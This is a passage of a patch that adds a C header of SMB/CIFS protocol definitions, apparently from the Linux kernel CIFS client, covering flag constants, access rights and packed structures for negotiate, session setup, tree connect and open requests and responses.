++ * Size of the ntlm client response
++ */
++#define CIFS_AUTH_RESP_SIZE (24)
++
++/*
++ * Size of the session key (crypto key encrypted with the password
++ */
++#define CIFS_SESS_KEY_SIZE (16)
++
++#define CIFS_SERVER_CHALLENGE_SIZE (8)
++#define CIFS_HMAC_MD5_HASH_SIZE (16)
++#define CIFS_CPHTXT_SIZE (16)
++#define CIFS_NTHASH_SIZE (16)
++
++/*
++ * Maximum user name length
++ */
++#define CIFS_UNLEN (20)
++
++/*
++ * Flags on SMB open
++ */
++#define SMBOPEN_WRITE_THROUGH 0x4000
++#define SMBOPEN_DENY_ALL      0x0010
++#define SMBOPEN_DENY_WRITE    0x0020
++#define SMBOPEN_DENY_READ     0x0030
++#define SMBOPEN_DENY_NONE     0x0040
++#define SMBOPEN_READ          0x0000
++#define SMBOPEN_WRITE         0x0001
++#define SMBOPEN_READWRITE     0x0002
++#define SMBOPEN_EXECUTE       0x0003
++
++#define SMBOPEN_OCREATE       0x0010
++#define SMBOPEN_OTRUNC        0x0002
++#define SMBOPEN_OAPPEND       0x0001
++
++/*
++ * SMB flag definitions
++ */
++#define SMBFLG_EXTD_LOCK 0x01	/* server supports lock-read write-unlock smb */
++#define SMBFLG_RCV_POSTED 0x02	/* obsolete */
++#define SMBFLG_RSVD 0x04
++#define SMBFLG_CASELESS 0x08	/* all pathnames treated as caseless (off
++				implies case sensitive file handling request) */
++#define SMBFLG_CANONICAL_PATH_FORMAT 0x10	/* obsolete */
++#define SMBFLG_OLD_OPLOCK 0x20	/* obsolete */
++#define SMBFLG_OLD_OPLOCK_NOTIFY 0x40	/* obsolete */
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++/*
++ * SMB flag2 definitions
++ */
++#define SMBFLG2_KNOWS_LONG_NAMES cpu_to_le16(1)	/* can send long (non-8.3)
++						   path names in response */
++#define SMBFLG2_KNOWS_EAS cpu_to_le16(2)
++#define SMBFLG2_SECURITY_SIGNATURE cpu_to_le16(4)
++#define SMBFLG2_COMPRESSED (8)
++#define SMBFLG2_SECURITY_SIGNATURE_REQUIRED (0x10)
++#define SMBFLG2_IS_LONG_NAME cpu_to_le16(0x40)
++#define SMBFLG2_REPARSE_PATH (0x400)
++#define SMBFLG2_EXT_SEC cpu_to_le16(0x800)
++#define SMBFLG2_DFS cpu_to_le16(0x1000)
++#define SMBFLG2_PAGING_IO cpu_to_le16(0x2000)
++#define SMBFLG2_ERR_STATUS cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE cpu_to_le16(0x8000)
++
++/*
++ * These are the file access permission bits defined in CIFS for the
++ * NTCreateAndX as well as the level 0x107
++ * TRANS2_QUERY_PATH_INFORMATION API.  The level 0x107, SMB_QUERY_FILE_ALL_INFO
++ * responds with the AccessFlags.
++ * The AccessFlags specifies the access permissions a caller has to the
++ * file and can have any suitable combination of the following values:
++ */
++
++#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
++#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
++#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
++#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
++					  /* with the file can be read        */
++#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
++					  /* with the file can be written     */
++#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
++					  /* the file using system paging I/O */
++#define FILE_DELETE_CHILD     0x00000040
++#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
++					  /* file can be read                 */
++#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
++					  /* file can be written              */
++#define DELETE                0x00010000  /* The file can be deleted          */
++#define READ_CONTROL          0x00020000  /* The access control list and      */
++					  /* ownership associated with the    */
++					  /* file can be read                 */
++#define WRITE_DAC             0x00040000  /* The access control list and      */
++					  /* ownership associated with the    */
++					  /* file can be written.             */
++#define WRITE_OWNER           0x00080000  /* Ownership information associated */
++					  /* with the file can be written     */
++#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
++					  /* synchronize with the completion  */
++					  /* of an input/output request       */
++#define SYSTEM_SECURITY       0x01000000  /* The system access control list   */
++					  /* can be read and changed          */
++#define GENERIC_ALL           0x10000000
++#define GENERIC_EXECUTE       0x20000000
++#define GENERIC_WRITE         0x40000000
++#define GENERIC_READ          0x80000000
++					 /* In summary - Relevant file       */
++					 /* access flags from CIFS are       */
++					 /* file_read_data, file_write_data  */
++					 /* file_execute, file_read_attributes*/
++					 /* write_dac, and delete.           */
++
++#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES)
++#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++				| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
++#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
++
++#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA | FILE_WRITE_EA \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++				| FILE_READ_EA | FILE_WRITE_EA \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
++				| FILE_READ_ATTRIBUTES \
++				| FILE_WRITE_ATTRIBUTES \
++				| DELETE | READ_CONTROL | WRITE_DAC \
++				| WRITE_OWNER | SYNCHRONIZE)
++
++#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
++				| READ_CONTROL | SYNCHRONIZE)
++
++
++/*
++ * Invalid readdir handle
++ */
++#define CIFS_NO_HANDLE        0xFFFF
++
++#define NO_CHANGE_64          0xFFFFFFFFFFFFFFFFULL
++
++/* IPC$ in ASCII */
++#define CIFS_IPC_RESOURCE "\x49\x50\x43\x24"
++
++/* IPC$ in Unicode */
++#define CIFS_IPC_UNICODE_RESOURCE "\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00"
++
++/* Unicode Null terminate 2 bytes of 0 */
++#define UNICODE_NULL "\x00\x00"
++#define ASCII_NULL 0x00
++
++/*
++ * Server type values (returned on EnumServer API
++ */
++#define CIFS_SV_TYPE_DC     0x00000008
++#define CIFS_SV_TYPE_BACKDC 0x00000010
++
++/*
++ * Alias type flags (From EnumAlias API call
++ */
++#define CIFS_ALIAS_TYPE_FILE 0x0001
++#define CIFS_SHARE_TYPE_FILE 0x0000
++
++/*
++ * File Attribute flags
++ */
++#define ATTR_READONLY  0x0001
++#define ATTR_HIDDEN    0x0002
++#define ATTR_SYSTEM    0x0004
++#define ATTR_VOLUME    0x0008
++#define ATTR_DIRECTORY 0x0010
++#define ATTR_ARCHIVE   0x0020
++#define ATTR_DEVICE    0x0040
++#define ATTR_NORMAL    0x0080
++#define ATTR_TEMPORARY 0x0100
++#define ATTR_SPARSE    0x0200
++#define ATTR_REPARSE   0x0400
++#define ATTR_COMPRESSED 0x0800
++#define ATTR_OFFLINE    0x1000	/* ie file not immediately available -
++					on offline storage */
++#define ATTR_NOT_CONTENT_INDEXED 0x2000
++#define ATTR_ENCRYPTED  0x4000
++#define ATTR_POSIX_SEMANTICS 0x01000000
++#define ATTR_BACKUP_SEMANTICS 0x02000000
++#define ATTR_DELETE_ON_CLOSE 0x04000000
++#define ATTR_SEQUENTIAL_SCAN 0x08000000
++#define ATTR_RANDOM_ACCESS   0x10000000
++#define ATTR_NO_BUFFERING    0x20000000
++#define ATTR_WRITE_THROUGH   0x80000000
++
++/* ShareAccess flags */
++#define FILE_NO_SHARE     0x00000000
++#define FILE_SHARE_READ   0x00000001
++#define FILE_SHARE_WRITE  0x00000002
++#define FILE_SHARE_DELETE 0x00000004
++#define FILE_SHARE_ALL    0x00000007
++
++/* CreateDisposition flags, similar to CreateAction as well */
++#define FILE_SUPERSEDE    0x00000000
++#define FILE_OPEN         0x00000001
++#define FILE_CREATE       0x00000002
++#define FILE_OPEN_IF      0x00000003
++#define FILE_OVERWRITE    0x00000004
++#define FILE_OVERWRITE_IF 0x00000005
++
++/* CreateOptions */
++#define CREATE_NOT_FILE		0x00000001	/* if set must not be file */
++#define CREATE_WRITE_THROUGH	0x00000002
++#define CREATE_SEQUENTIAL       0x00000004
++#define CREATE_NO_BUFFER        0x00000008      /* should not buffer on srv */
++#define CREATE_SYNC_ALERT       0x00000010	/* MBZ */
++#define CREATE_ASYNC_ALERT      0x00000020	/* MBZ */
++#define CREATE_NOT_DIR		0x00000040    /* if set must not be directory */
++#define CREATE_TREE_CONNECTION  0x00000080	/* should be zero */
++#define CREATE_COMPLETE_IF_OPLK 0x00000100	/* should be zero */
++#define CREATE_NO_EA_KNOWLEDGE  0x00000200
++#define CREATE_EIGHT_DOT_THREE  0x00000400	/* doc says this is obsolete
++						 "open for recovery" flag should
++						 be zero in any case */
++#define CREATE_OPEN_FOR_RECOVERY 0x00000400
++#define CREATE_RANDOM_ACCESS	0x00000800
++#define CREATE_DELETE_ON_CLOSE	0x00001000
++#define CREATE_OPEN_BY_ID       0x00002000
++#define CREATE_OPEN_BACKUP_INTENT 0x00004000
++#define CREATE_NO_COMPRESSION   0x00008000
++#define CREATE_RESERVE_OPFILTER 0x00100000	/* should be zero */
++#define OPEN_REPARSE_POINT	0x00200000
++#define OPEN_NO_RECALL          0x00400000
++#define OPEN_FREE_SPACE_QUERY   0x00800000	/* should be zero */
++#define CREATE_OPTIONS_MASK     0x007FFFFF
++#define CREATE_OPTION_READONLY	0x10000000
++#define CREATE_OPTION_SPECIAL   0x20000000   /* system. NB not sent over wire */
++
++/* ImpersonationLevel flags */
++#define SECURITY_ANONYMOUS      0
++#define SECURITY_IDENTIFICATION 1
++#define SECURITY_IMPERSONATION  2
++#define SECURITY_DELEGATION     3
++
++/* SecurityFlags */
++#define SECURITY_CONTEXT_TRACKING 0x01
++#define SECURITY_EFFECTIVE_ONLY   0x02
++
++/*
++ * Default PID value, used in all SMBs where the PID is not important
++ */
++#define CIFS_DFT_PID  0x1234
++
++/*
++ * We use the same routine for Copy and Move SMBs.  This flag is used to
++ * distinguish
++ */
++#define CIFS_COPY_OP 1
++#define CIFS_RENAME_OP 2
++
++#define GETU16(var)  (*((__u16 *)var))	/* BB check for endian issues */
++#define GETU32(var)  (*((__u32 *)var))	/* BB check for endian issues */
++
++struct smb_hdr {
++	__be32 smb_buf_length;	/* BB length is only two (rarely three) bytes,
++		with one or two byte "type" preceding it that will be
++		zero - we could mask the type byte off */
++	__u8 Protocol[4];
++	__u8 Command;
++	union {
++		struct {
++			__u8 ErrorClass;
++			__u8 Reserved;
++			__le16 Error;
++		} __attribute__((packed)) DosError;
++		__le32 CifsError;
++	} __attribute__((packed)) Status;
++	__u8 Flags;
++	__le16 Flags2;		/* note: le */
++	__le16 PidHigh;
++	union {
++		struct {
++			__le32 SequenceNumber;  /* le */
++			__u32 Reserved; /* zero */
++		} __attribute__((packed)) Sequence;
++		__u8 SecuritySignature[8];	/* le */
++	} __attribute__((packed)) Signature;
++	__u8 pad[2];
++	__u16 Tid;
++	__le16 Pid;
++	__u16 Uid;
++	__le16 Mid;
++	__u8 WordCount;
++} __attribute__((packed));
++
++/* given a pointer to an smb_hdr, retrieve a void pointer to the ByteCount */
++static inline void *
++BCC(struct smb_hdr *smb)
++{
++	return (void *)smb + sizeof(*smb) + 2 * smb->WordCount;
++}
++
++/* given a pointer to an smb_hdr retrieve the pointer to the byte area */
++#define pByteArea(smb_var) (BCC(smb_var) + 2)
++
++/* get the unconverted ByteCount for a SMB packet and return it */
++static inline __u16
++get_bcc(struct smb_hdr *hdr)
++{
++	__le16 *bc_ptr = (__le16 *)BCC(hdr);
++
++	return get_unaligned_le16(bc_ptr);
++}
++
++/* set the ByteCount for a SMB packet in little-endian */
++static inline void
++put_bcc(__u16 count, struct smb_hdr *hdr)
++{
++	__le16 *bc_ptr = (__le16 *)BCC(hdr);
++
++	put_unaligned_le16(count, bc_ptr);
++}
++
++/*
++ * Computer Name Length (since Netbios name was length 16 with last byte 0x20)
++ * No longer as important, now that TCP names are more commonly used to
++ * resolve hosts.
++ */
++#define CNLEN 15
++
++/*
++ * Share Name Length (SNLEN)
++ * Note:  This length was limited by the SMB used to get
++ *        the Share info.   NetShareEnum only returned 13
++ *        chars, including the null termination.
++ * This was removed because it no longer is limiting.
++ */
++
++/*
++ * Comment Length
++ */
++#define MAXCOMMENTLEN 40
++
++/*
++ * The OS/2 maximum path name
++ */
++#define MAX_PATHCONF 256
++
++/*
++ *  SMB frame definitions  (following must be packed structs)
++ *  See the SNIA CIFS Specification for details.
++ *
++ *  The Naming convention is the lower case version of the
++ *  smb command code name for the struct and this is typedef to the
++ *  uppercase version of the same name with the prefix SMB_ removed
++ *  for brevity.  Although typedefs are not commonly used for
++ *  structure definitions in the Linux kernel, their use in the
++ *  CIFS standards document, which this code is based on, may
++ *  make this one of the cases where typedefs for structures make
++ *  sense to improve readability for readers of the standards doc.
++ *  Typedefs can always be removed later if they are too distracting
++ *  and they are only used for the CIFSs PDUs themselves, not
++ *  internal cifs vfs structures
++ *
++ */
++
++typedef struct negotiate_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	unsigned char DialectsArray[];
++} __attribute__((packed)) NEGOTIATE_REQ;
++
++#define MIN_TZ_ADJ (15 * 60) /* minimum grid for timezones in seconds */
++
++#define READ_RAW_ENABLE 1
++#define WRITE_RAW_ENABLE 2
++#define RAW_ENABLE (READ_RAW_ENABLE | WRITE_RAW_ENABLE)
++#define SMB1_CLIENT_GUID_SIZE (16)
++typedef struct negotiate_rsp {
++	struct smb_hdr hdr;	/* wct = 17 */
++	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
++	__u8 SecurityMode;
++	__le16 MaxMpxCount;
++	__le16 MaxNumberVcs;
++	__le32 MaxBufferSize;
++	__le32 MaxRawSize;
++	__le32 SessionKey;
++	__le32 Capabilities;	/* see below */
++	__le32 SystemTimeLow;
++	__le32 SystemTimeHigh;
++	__le16 ServerTimeZone;
++	__u8 EncryptionKeyLength;
++	__u16 ByteCount;
++	union {
++		/* cap extended security off */
++		DECLARE_FLEX_ARRAY(unsigned char, EncryptionKey);
++		/* followed by Domain name - if extended security is off */
++		/* followed by 16 bytes of server GUID */
++		/* then security blob if cap_extended_security negotiated */
++		struct {
++			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
++			unsigned char SecurityBlob[];
++		} __attribute__((packed)) extended_response;
++	} __attribute__((packed)) u;
++} __attribute__((packed)) NEGOTIATE_RSP;
++
++/* SecurityMode bits */
++#define SECMODE_USER          0x01	/* off indicates share level security */
++#define SECMODE_PW_ENCRYPT    0x02
++#define SECMODE_SIGN_ENABLED  0x04	/* SMB security signatures enabled */
++#define SECMODE_SIGN_REQUIRED 0x08	/* SMB security signatures required */
++
++/* Negotiate response Capabilities */
++#define CAP_RAW_MODE           0x00000001
++#define CAP_MPX_MODE           0x00000002
++#define CAP_UNICODE            0x00000004
++#define CAP_LARGE_FILES        0x00000008
++#define CAP_NT_SMBS            0x00000010	/* implies CAP_NT_FIND */
++#define CAP_RPC_REMOTE_APIS    0x00000020
++#define CAP_STATUS32           0x00000040
++#define CAP_LEVEL_II_OPLOCKS   0x00000080
++#define CAP_LOCK_AND_READ      0x00000100
++#define CAP_NT_FIND            0x00000200
++#define CAP_DFS                0x00001000
++#define CAP_INFOLEVEL_PASSTHRU 0x00002000
++#define CAP_LARGE_READ_X       0x00004000
++#define CAP_LARGE_WRITE_X      0x00008000
++#define CAP_LWIO               0x00010000 /* support fctl_srv_req_resume_key */
++#define CAP_UNIX               0x00800000
++#define CAP_COMPRESSED_DATA    0x02000000
++#define CAP_DYNAMIC_REAUTH     0x20000000
++#define CAP_PERSISTENT_HANDLES 0x40000000
++#define CAP_EXTENDED_SECURITY  0x80000000
++
++typedef union smb_com_session_setup_andx {
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 12 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 SecurityBlobLength;
++		__u32 Reserved;
++		__le32 Capabilities;	/* see below */
++		__le16 ByteCount;
++		unsigned char SecurityBlob[1];	/* followed by */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) req;	/* NTLM request format (with
++					extended security */
++
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 13 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 CaseInsensitivePasswordLength; /* ASCII password len */
++		__le16 CaseSensitivePasswordLength; /* Unicode password length*/
++		__u32 Reserved;	/* see below */
++		__le32 Capabilities;
++		__le16 ByteCount;
++		unsigned char CaseInsensitivePassword[1];     /* followed by: */
++		/* unsigned char * CaseSensitivePassword; */
++		/* STRING AccountName */
++		/* STRING PrimaryDomain */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) req_no_secext; /* NTLM request format (without
++							extended security */
++
++	struct {		/* default (NTLM) response format */
++		struct smb_hdr hdr;	/* wct = 4 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 Action;	/* see below */
++		__le16 SecurityBlobLength;
++		__u16 ByteCount;
++		unsigned char SecurityBlob[1];	/* followed by */
++/*      unsigned char  * NativeOS;      */
++/*	unsigned char  * NativeLanMan;  */
++/*      unsigned char  * PrimaryDomain; */
++	} __attribute__((packed)) resp;	/* NTLM response
++					   (with or without extended sec) */
++
++	struct {		/* request format */
++		struct smb_hdr hdr;	/* wct = 10 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 MaxBufferSize;
++		__le16 MaxMpxCount;
++		__le16 VcNumber;
++		__u32 SessionKey;
++		__le16 PasswordLength;
++		__u32 Reserved; /* encrypt key len and offset */
++		__le16 ByteCount;
++		unsigned char AccountPassword[1];	/* followed by */
++		/* STRING AccountName */
++		/* STRING PrimaryDomain */
++		/* STRING NativeOS */
++		/* STRING NativeLanMan */
++	} __attribute__((packed)) old_req; /* pre-NTLM (LANMAN2.1) req format */
++
++	struct {		/* default (NTLM) response format */
++		struct smb_hdr hdr;	/* wct = 3 */
++		__u8 AndXCommand;
++		__u8 AndXReserved;
++		__le16 AndXOffset;
++		__le16 Action;	/* see below */
++		__u16 ByteCount;
++		unsigned char NativeOS[1];	/* followed by */
++/*	unsigned char * NativeLanMan; */
++/*      unsigned char * PrimaryDomain; */
++	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
++} __attribute__((packed)) SESSION_SETUP_ANDX;
++
++/* format of NLTMv2 Response ie "case sensitive password" hash when NTLMv2 */
++
++#define NTLMSSP_SERVER_TYPE	1
++#define NTLMSSP_DOMAIN_TYPE	2
++#define NTLMSSP_FQ_DOMAIN_TYPE	3
++#define NTLMSSP_DNS_DOMAIN_TYPE	4
++#define NTLMSSP_DNS_PARENT_TYPE	5
++
++struct ntlmssp2_name {
++	__le16 type;
++	__le16 length;
++/*	char   name[length]; */
++} __attribute__((packed));
++
++struct ntlmv2_resp {
++	union {
++	    char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	    struct {
++		__u8 reserved[8];
++		__u8 key[CIFS_SERVER_CHALLENGE_SIZE];
++	    } __attribute__((packed)) challenge;
++	} __attribute__((packed));
++	__le32 blob_signature;
++	__u32  reserved;
++	__le64  time;
++	__u64  client_chal; /* random */
++	__u32  reserved2;
++	/* array of name entries could follow ending in minimum 4 byte struct */
++} __attribute__((packed));
++
++
++#define CIFS_NETWORK_OPSYS "CIFS VFS Client for Linux"
++
++/* Capabilities bits (for NTLM SessSetup request) */
++#define CAP_UNICODE            0x00000004
++#define CAP_LARGE_FILES        0x00000008
++#define CAP_NT_SMBS            0x00000010
++#define CAP_STATUS32           0x00000040
++#define CAP_LEVEL_II_OPLOCKS   0x00000080
++#define CAP_NT_FIND            0x00000200	/* reserved should be zero
++				(because NT_SMBs implies the same thing?) */
++#define CAP_BULK_TRANSFER      0x20000000
++#define CAP_EXTENDED_SECURITY  0x80000000
++
++/* Action bits */
++#define GUEST_LOGIN 1
++
++typedef struct smb_com_tconx_req {
++	struct smb_hdr hdr;	/* wct = 4 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Flags;		/* see below */
++	__le16 PasswordLength;
++	__le16 ByteCount;
++	unsigned char Password[1];	/* followed by */
++/* STRING Path    *//* \\server\share name */
++	/* STRING Service */
++} __attribute__((packed)) TCONX_REQ;
++
++typedef struct smb_com_tconx_rsp {
++	struct smb_hdr hdr;	/* wct = 3 , not extended response */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OptionalSupport;	/* see below */
++	__u16 ByteCount;
++	unsigned char Service[1];	/* always ASCII, not Unicode */
++	/* STRING NativeFileSystem */
++} __attribute__((packed)) TCONX_RSP;
++
++typedef struct smb_com_tconx_rsp_ext {
++	struct smb_hdr hdr;	/* wct = 7, extended response */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OptionalSupport;	/* see below */
++	__le32 MaximalShareAccessRights;
++	__le32 GuestMaximalShareAccessRights;
++	__u16 ByteCount;
++	unsigned char Service[1];	/* always ASCII, not Unicode */
++	/* STRING NativeFileSystem */
++} __attribute__((packed)) TCONX_RSP_EXT;
++
++
++/* tree connect Flags */
++#define DISCONNECT_TID          0x0001
++#define TCON_EXTENDED_SIGNATURES 0x0004
++#define TCON_EXTENDED_SECINFO   0x0008
++
++/* OptionalSupport bits */
++#define SMB_SUPPORT_SEARCH_BITS 0x0001	/* "must have" directory search bits
++					 (exclusive searches supported) */
++#define SMB_SHARE_IS_IN_DFS     0x0002
++#define SMB_CSC_MASK               0x000C
++/* CSC flags defined as follows */
++#define SMB_CSC_CACHE_MANUAL_REINT 0x0000
++#define SMB_CSC_CACHE_AUTO_REINT   0x0004
++#define SMB_CSC_CACHE_VDO          0x0008
++#define SMB_CSC_NO_CACHING         0x000C
++#define SMB_UNIQUE_FILE_NAME    0x0010
++#define SMB_EXTENDED_SIGNATURES 0x0020
++
++/* services
++ *
++ * A:       ie disk
++ * LPT1:    ie printer
++ * IPC      ie named pipe
++ * COMM
++ * ?????    ie any type
++ *
++ */
++
++typedef struct smb_com_echo_req {
++	struct	smb_hdr hdr;
++	__le16	EchoCount;
++	__le16	ByteCount;
++	char	Data[1];
++} __attribute__((packed)) ECHO_REQ;
++
++typedef struct smb_com_echo_rsp {
++	struct	smb_hdr hdr;
++	__le16	SequenceNumber;
++	__le16	ByteCount;
++	char	Data[1];
++} __attribute__((packed)) ECHO_RSP;
++
++typedef struct smb_com_logoff_andx_req {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__u16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOGOFF_ANDX_REQ;
++
++typedef struct smb_com_logoff_andx_rsp {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__u16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOGOFF_ANDX_RSP;
++
++typedef union smb_com_tree_disconnect {	/* as an altetnative can use flag on
++					tree_connect PDU to effect disconnect */
++					/* tdis is probably simplest SMB PDU */
++	struct {
++		struct smb_hdr hdr;	/* wct = 0 */
++		__u16 ByteCount;	/* bcc = 0 */
++	} __attribute__((packed)) req;
++	struct {
++		struct smb_hdr hdr;	/* wct = 0 */
++		__u16 ByteCount;	/* bcc = 0 */
++	} __attribute__((packed)) resp;
++} __attribute__((packed)) TREE_DISCONNECT;
++
++typedef struct smb_com_close_req {
++	struct smb_hdr hdr;	/* wct = 3 */
++	__u16 FileID;
++	__u32 LastWriteTime;	/* should be zero or -1 */
++	__u16 ByteCount;	/* 0 */
++} __attribute__((packed)) CLOSE_REQ;
++
++typedef struct smb_com_close_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) CLOSE_RSP;
++
++typedef struct smb_com_flush_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__u16 FileID;
++	__u16 ByteCount;	/* 0 */
++} __attribute__((packed)) FLUSH_REQ;
++
++typedef struct smb_com_findclose_req {
++	struct smb_hdr hdr; /* wct = 1 */
++	__u16 FileID;
++	__u16 ByteCount;    /* 0 */
++} __attribute__((packed)) FINDCLOSE_REQ;
++
++/* OpenFlags */
++#define REQ_MORE_INFO      0x00000001  /* legacy (OPEN_AND_X) only */
++#define REQ_OPLOCK         0x00000002
++#define REQ_BATCHOPLOCK    0x00000004
++#define REQ_OPENDIRONLY    0x00000008
++#define REQ_EXTENDED_INFO  0x00000010
++
++/* File type */
++#define DISK_TYPE		0x0000
++#define BYTE_PIPE_TYPE		0x0001
++#define MESSAGE_PIPE_TYPE	0x0002
++#define PRINTER_TYPE		0x0003
++#define COMM_DEV_TYPE		0x0004
++#define UNKNOWN_TYPE		0xFFFF
++
++/* Device Type or File Status Flags */
++#define NO_EAS			0x0001
++#define NO_SUBSTREAMS		0x0002
++#define NO_REPARSETAG		0x0004
++/* following flags can apply if pipe */
++#define ICOUNT_MASK		0x00FF
++#define PIPE_READ_MODE		0x0100
++#define NAMED_PIPE_TYPE		0x0400
++#define PIPE_END_POINT		0x4000
++#define BLOCKING_NAMED_PIPE	0x8000
++
++typedef struct smb_com_open_req {	/* also handles create */
++	struct smb_hdr hdr;	/* wct = 24 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 Reserved;		/* Must Be Zero */
++	__le16 NameLength;
++	__le32 OpenFlags;
++	__u32  RootDirectoryFid;
++	__le32 DesiredAccess;
++	__le64 AllocationSize;
++	__le32 FileAttributes;
++	__le32 ShareAccess;
++	__le32 CreateDisposition;
++	__le32 CreateOptions;
++	__le32 ImpersonationLevel;
++	__u8 SecurityFlags;
++	__le16 ByteCount;
++	char fileName[1];
++} __attribute__((packed)) OPEN_REQ;
++
++/* open response: oplock levels */
++#define OPLOCK_NONE  	 0
++#define OPLOCK_EXCLUSIVE 1
++#define OPLOCK_BATCH	 2
++#define OPLOCK_READ	 3  /* level 2 oplock */
++
++/* open response for CreateAction shifted left */
++#define CIFS_CREATE_ACTION 0x20000 /* file created */
++
++typedef struct smb_com_open_rsp {
++	struct smb_hdr hdr;	/* wct = 34 BB */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 OplockLevel;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 FileAttributes;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le16 FileType;
++	__le16 DeviceState;
++	__u8 DirectoryFlag;
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) OPEN_RSP;
++
++typedef struct smb_com_open_rsp_ext {
++	struct smb_hdr hdr;     /* wct = 42 but meaningless due to MS bug? */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 OplockLevel;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 FileAttributes;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le16 FileType;
++	__le16 DeviceState;
++	__u8 DirectoryFlag;
++	__u8 VolumeGUID[16];
++	__u64 FileId; /* note no endian conversion - is opaque UniqueID */
++	__le32 MaximalAccessRights;
++	__le32 GuestMaximalAccessRights;
++	__u16 ByteCount;        /* bct = 0 */
++} __attribute__((packed)) OPEN_RSP_EXT;
++
++
++/* format of legacy open request */
++typedef struct smb_com_openx_req {
++	struct smb_hdr	hdr;	/* wct = 15 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OpenFlags;
++	__le16 Mode;
++	__le16 Sattr; /* search attributes */
++	__le16 FileAttributes;  /* dos attrs */
++	__le32 CreateTime; /* os2 format */
++	__le16 OpenFunction;
++	__le32 EndOfFile;
++	__le32 Timeout;
++	__le32 Reserved;
++	__le16  ByteCount;  /* file name follows */
++	char   fileName[1];
++} __attribute__((packed)) OPENX_REQ;
++
++typedef struct smb_com_openx_rsp {
++	struct smb_hdr	hdr;	/* wct = 15 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16  Fid;
++	__le16 FileAttributes;
++	__le32 LastWriteTime; /* os2 format */
++	__le32 EndOfFile;
++	__le16 Access;
++	__le16 FileType;
++	__le16 IPCState;
++	__le16 Action;
++	__u32  FileId;
++	__u16  Reserved;
++	__u16  ByteCount;
++} __attribute__((packed)) OPENX_RSP;
++
++/* For encoding of POSIX Open Request - see trans2 function 0x209 data struct */
++
++/* Legacy write request for older servers */
++typedef struct smb_com_writex_req {
